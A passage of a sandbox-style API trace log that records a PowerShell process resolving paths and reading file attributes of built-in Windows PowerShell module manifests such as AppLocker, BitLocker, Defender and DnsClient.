nFileSizeHigh=0x0, nFileSizeLow=0x256)) returned 1 [0226.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", lpFilePart=0x0) returned 0x71 [0226.275] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.275] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\microsoft.powershell.archive.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c)) returned 1 [0226.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", lpFilePart=0x0) returned 0x5b [0226.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.276] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368)) returned 1 [0226.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", lpFilePart=0x0) returned 0x4b [0226.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.276] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420)) returned 1 [0226.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1", lpFilePart=0x0) returned 0x41 [0226.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.276] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\appx.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352)) returned 1 [0226.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.276] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadLine.psm1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadLine.psm1", lpFilePart=0x0) returned 0x49 [0226.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.276] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadLine.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psm1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4)) returned 1 [0226.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.277] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0226.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.277] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8)) returned 1 [0226.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.277] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psm1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psm1", lpFilePart=0x0) returned 0x43 [0226.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.277] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psm1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de)) returned 1 [0226.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.277] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0226.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.277] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0226.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.278] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", lpFilePart=0x0) returned 0x4e [0226.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.278] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3)) returned 1 [0226.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.278] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0226.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.278] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4)) returned 1 [0226.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\.\\AssignedAccess.psm1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psm1", lpFilePart=0x0) returned 0x55 [0226.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.278] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\assignedaccess.psm1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x692d2629, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x692f8869, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1d69)) returned 1 [0226.279] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", lpFilePart=0x0) returned 0x55 [0226.280] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.280] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\assignedaccess.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37eb452f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37eb452f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x198)) returned 1 [0226.280] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psm1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psm1", lpFilePart=0x0) returned 0x4b [0226.280] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.280] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker\\bitlocker.psm1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48564)) returned 1 [0226.280] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", lpFilePart=0x0) returned 0x4b [0226.280] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.280] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker\\bitlocker.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x644)) returned 1 [0226.280] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0226.280] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.280] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x59c)) returned 1 [0226.281] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", lpFilePart=0x0) returned 0x4f [0226.281] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.281] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache\\branchcache.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x699)) returned 1 [0226.281] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", lpFilePart=0x0) returned 0x4d [0226.281] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.281] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets\\cimcmdlets.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72c)) returned 1 [0226.281] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0226.281] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.281] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x544)) returned 1 [0226.281] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1", lpFilePart=0x0) returned 0x71 [0226.281] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.282] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\directaccessclientcomponents\\directaccessclientcomponents.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa3b30d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa3b30d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa3b30d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x436)) returned 1 [0226.282] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism\\Dism.psm1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism\\Dism.psm1", lpFilePart=0x0) returned 0x41 [0226.282] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.282] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism\\Dism.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dism\\dism.psm1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a7)) returned 1 [0226.282] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism\\Dism.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism\\Dism.psd1", lpFilePart=0x0) returned 0x41 [0226.282] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.282] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism\\Dism.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dism\\dism.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x817)) returned 1 [0226.282] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1", lpFilePart=0x0) returned 0x4b [0226.282] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.282] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dnsclient\\dnsclient.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, 